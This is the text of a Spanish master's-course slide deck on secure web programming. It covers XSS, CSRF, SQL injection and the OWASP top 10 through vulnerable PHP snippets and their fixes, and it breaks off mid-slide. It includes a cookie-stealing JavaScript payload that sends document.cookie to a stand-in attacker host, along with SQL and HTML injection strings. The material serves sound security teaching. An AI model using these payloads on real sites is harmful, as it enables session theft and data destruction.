PDF de programación - Módulo VI - Programación Segura - Seguridad en la web

Máster Profesional

en Tecnologías de Seguridad

Módulo VI - Programación Segura

Seguridad en la web

@josereyero

http://www.reyero.net

[email protected]

Seguridad en la Web

Introducción y objetivos
Programa de ejemplo
Seguridad en teoría
Seguridad en la práctica
Técnicas: XSS, CSRF, ....
Herramientas más seguras
Resumen y conclusión



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



2

Sólo sé

que no sé nada.

(como voy a demostrar)

(y yo también he escrito código inseguro)



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



3

pequeñas mentiras

y

Grandes
Verdades



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



4

pequeñas mentiras

Esta web es completamente segura.

Tiene muchos avisos de seguridad... ojo.

Por fin hemos conseguido que sea seguro.

El código abierto es más seguro.

El código abierto es menos seguro.

Estos datos son seguros.

Yo lo sé todo sobre seguridad en Internet.

Este lenguaje de programación es seguro.



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



5

Grandes Verdades

Lo único seguro en la vida... es que nos vamos a morir.
Si una aplicación no tiene ningún aviso de seguridad... ?

La seguridad no es un estado... es un proceso.

El código abierto es código abierto

Si es abierto, puedes tener garantías de que es seguro

(o no)

Las cosas son seguras en un contexto (para un uso).

La inteligencia tiene límites, la estupidez no.

El lenguaje de programación es infinitamente menos

importante que el programador.



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



6

Cosillas

del

desarollo

web



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



7

El enemigo

Jose A Reyero - Development Seed - Drupal Conference – DC - March 2009

Web 2.0

= Seguridad 2.0

Contenido generado por el usuario

Feeds RSS
Servicios

(Flickr, Google maps....)



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



9

Cocktail de tecnología

Unix
Oracle
Apache
Java
JSP
HTTP
Firefox
HTML
AJAX
Flash
PDF



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



10

Lenguages de Script

Ves lo que compras / ves lo que corre en el
servidor.
El programa sigue corriendo mucho tiempo
después de que el código se ha perdido.
Algunos, especialmente diseñados para la web.
Pequeña Teoría de la Complejidad (- es +)



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



11

La seguridad es...

Lenguajes de programación?

Frameworks?

Sistemas operativos?

Servidores?

Navegadores?



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



12

http://commons.wikimedia.org



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



13

technology can solve your security problems,

you don't understand the problems

you don't understand the technology.

If you think

then

and

Bruce Schneier



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



14

Roles

Construir
Estudiar
Destruir



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



15

La historia nos demuestra...

...que nunca aprendemos nada de la historia.

Máster Profesional en Tecnologías de Seguridad



INTECO - UNIVERSIDAD DE LEÓN



16

La Información es Poder

http://secunia.com/advisories/search/

http://ha.ckers.org/xss.html

http://www.gnucitizen.org/

http://www.google.com/



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



17

La sabiduría consiste en ser capaz de distinguir

entre los peligros y elegir el menos dañino.

Maquiavelo, “El Príncipe”



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



18

CSI

Corto pero Sumamente Inseguro

(Práctica en PHP)



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



19

CSI

sudo su
apt-get install apache2 php5
dpkg-reconfigure apache2 php5
cd /var/www
wget http://reyero.net/csi.tar.gz
tar xvzf csi.tar.gz
http://localhost/csi/csi.php



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



20

CSI



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



21

CSI

http://localhost/csi.php
http://localhost/xss.html
http://localhost/csrf.html



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



22

Conceptos

Cliente <------- HTTP / HTTPS -------> Servidor

Cookies
Sesión
URL
Post



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



23

El eje del mal

HTTP / HTML

Javascript (AJAX)

Cadenas de texto

Otros bichos (Flash, PDF, ...)

....



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



24

La importancia del dominio

http://midominio.com/.........



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



25

Javascript



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



26

Cómo de malo?

alert(document.cookies);

document.write('<h1>Tu web me pertenece</h1>');

new Image().src =

"http://malos.example.com/guarda.cgi?

cookiesrobadas="+encodeURI(document.cookie);



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



27

Javascript

var params = "user=value1&password=value2";
http.open("POST", “password.php”, true);

http.setRequestHeader("Content-type", "application/x-www-
form-urlencoded");
http.setRequestHeader("Content-length", params.length);
http.setRequestHeader("Connection", "close");

http.onreadystatechange = function() {
if(http.readyState == 4 && http.status == 200) {
alert(http.responseText);
}
}



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



28

El contexto

Es ...¿seguro?¿inseguro?



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



29

Texto y Contexto

jose

SELECT FROM users WHERE name = 'jose';

<h2>Hola jose</h2>

nombre = 'jose';

http://miweb.com/jose



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



30

Texto y Contexto

SELECT FROM users

WHERE name = 'malo';DROP DATABASE';

<h2>Hola malo</h2><h2>Envía SMS al 666</h2>

nombre = 'malo';alert(“Hola”);//';

http://miweb.com/malo?delete=yes



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



31

Recuerda

validar antes de usar



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



32

OWASP top 10

Cross Site Scripting (XSS)
Injection Flaws
Malicious File Execution
Insecure Direct Object Reference
Cross Site Request Forgery (CSRF)
Information leakage and Improper Error Handling
Broken Authentication and Session Management
Insecure Cryptographic Storage
Insecure Communications
Failure to Restrict URL access

http://www.owasp.org/index.php/Top_10_2007



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



33



Máster Profesional en Tecnologías de Seguridad



http://hackademix.net/2008/04/26/mass-attack-faq/

INTECO - UNIVERSIDAD DE LEÓN

34

XSS

Cross-site Scripting

¿qué?

¿cómo?

¿cuándo?

¿dónde?

http://en.wikipedia.org/wiki/Cross-site_scripting



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



35

XSS - ¿qué?

Introducen código (ejecutable o no) en una
página que está en nuestro dominio
HTML, Javascript, CSS, etc, etc..

Lenguajes: todos
HTTPS: Sí



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



36

XSS - ¿cómo?

Enlace

Contenido

Javascript

La “víctima” sólo tiene que visitar la página

maliciosa o nuestra página con contenido “malo”



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



37

XSS - ¿dónde?

print "<p>No se ha podido iniciar
sesion para $login </p>\n";

print "<p>Hola $usuario </p>";



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



38

XSS - solución

print "<p>No se ha podido iniciar
sesion para “ .
htmlspecialchars($login) . “ </p>\n";

print "<p>Hola “ .
htmlspecialchars($usuario) . “</p>";



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



39

XSS para jugar

http://ha.ckers.org/xss.html



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



40

CSRF

Cross-site Request Forgery

¿qué?

¿cómo?

¿cuándo?

¿dónde?

http://en.wikipedia.org/wiki/Csrf



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



41

CSRF - ¿qué?

Ejecutar “acciones” con las credenciales del

usuario

Puede hacer todo lo que el usuario puede hacer

No es específico del lenguaje de programacioń



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



42

CSRF - ¿cómo?

Enlace

Formulario
Javascript

La “víctima” sólo tiene que visitar la página

maliciosa



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



43

CSRF - ¿cuándo?

Una URL ejecuta una acción

Formulario ejecuta una acción

Tanto las URLs como los formularios necesitan
medidas de seguridad adicionales



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



44

CSRF - ¿dónde?

<form>
<input type="hidden" name="accion" value="accion" />
<input type="submit" value="Accion" />
</form>

case 'accion':
if ($usuario) {
accion_potencialmente_desastrosa();
}



Máster Profesional en Tecnologías de Seguridad

INTECO - UNIVERSIDAD DE LEÓN



45

CSRF – Solución (PHP)

<form>
<input type="hidden" name="accion" value="accion" />
<input type="hidden" name="token" value="a3dffs78" />
<input type="submit" value="Accion" />
</